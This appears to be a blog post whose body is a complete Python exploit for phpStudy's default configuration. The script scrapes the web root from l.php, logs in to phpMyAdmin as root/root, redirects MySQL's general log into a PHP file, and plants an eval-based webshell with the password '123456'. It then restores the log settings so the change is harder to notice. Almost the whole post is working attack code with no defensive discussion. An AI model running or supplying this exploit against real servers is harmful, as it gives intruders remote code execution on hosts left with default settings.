phpStudy 默认配置 POC

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# phpStudy Get WebShell

import hashlib
import re
import requests
import sys
import time
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

shellpass = "123456"
signature = hashlib.md5(b"POC").hexdigest()
shellcode = "<?php echo @md5('POC');@eval($_POST['%s']);?>" % (shellpass,)
shellname = str(int(time.time())) + ".php"

def exploit(target):
    doc_root = get_doc_root(target)
    if not doc_root:
        return False

    shell = get_shell(target, doc_root)
    if not shell:
        return False
    else:
        return shell

def get_doc_root(target):
    URL = target + "/l.php"
    try:
        r = requests.get(URL, verify=False, timeout=5)
    except requests.exceptions.RequestException as e:
        return False
    else:
        r.encoding = "utf-8"

        if sys.version_info.major == 2:
            m = re.search(r"<td>绝对路径</td>\s+<td>(.+)</td>".decode("utf_8"), r.text)
        else:
            m = re.search(r"<td>绝对路径</td>\s+<td>(.+)</td>", r.text)

        if not m:
            return False
        else:
            return m.group(1).replace("\\", "/")

def get_shell(target, doc_root):
    URL_index = target + "/phpMyAdmin/index.php"
    URL_import = target + "/phpMyAdmin/import.php"

    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"}

    s = requests.Session()

    try:
        r = s.post(URL_index, data={"pma_username": "root", "pma_password": "root"}, headers=headers, verify=False, timeout=5)
    except requests.exceptions.RequestException as e:
        return False
    else:
        m = re.search(r"token = '(.+)';", r.text)
        if not m:
            return False
        else:
            token = m.group(1)

    try:
        related_to_general_log = True
        sql_query1 = "SHOW VARIABLES LIKE 'general_log%';"
        r1 = s.post(URL_import, data={"token": token, "sql_query": sql_query1}, headers=headers, verify=False, timeout=5)
    except requests.exceptions.RequestException as e:
        related_to_general_log = False

    try:
        sql_query2 = "SET GLOBAL general_log = ON;SET GLOBAL general_log_file = '%s/%s';SELECT '%s';" % (doc_root, shellname, shellcode)
        r2 = s.post(URL_import, data={"token": token, "sql_query": sql_query2}, headers=headers, verify=False, timeout=5)
    except requests.exceptions.RequestException as e:
        return False
    else:
        shell = check_shell(target)
        if not shell:
            return False
        else:
            if related_to_general_log:
                try:
                    general_log, general_log_file = ("", "")
                    general_log, general_log_file = re.findall(r'<td  class="data grid_edit     ">(.+)</td>', r1.text)
                except ValueError as e:
                    sql_query3 = "SET GLOBAL general_log = OFF;"
                else:
                    sql_query3 = "SET GLOBAL general_log = %s;SET GLOBAL general_log_file = '%s';" % (general_log, general_log_file.replace("\\", "\\\\"))
                finally:
                    try:
                        r3 = s.post(URL_import, data={"token": token, "sql_query": sql_query3}, headers=headers, verify=False, timeout=5)
                    except requests.exceptions.RequestException as e:
                        pass
            return shell

def check_shell(target):
    URL = target + "/" + shellname
    try:
        r = requests.get(URL, verify=False, timeout=5)
    except requests.exceptions.RequestException as e:
        return False
    else:
        if signature not in r.text:
            return False
        else:
            return URL + ", " + shellpass

def main():
    try:
        target = sys.argv[1]
    except IndexError as e:
        print("phpStudy Get WebShell")
    else:
        result = exploit(target)
        print(result)

if __name__ == "__main__":
    main()

 

上一篇:UPUPW 默认配置 POC


下一篇:MySQL监控全部执行过的sql语句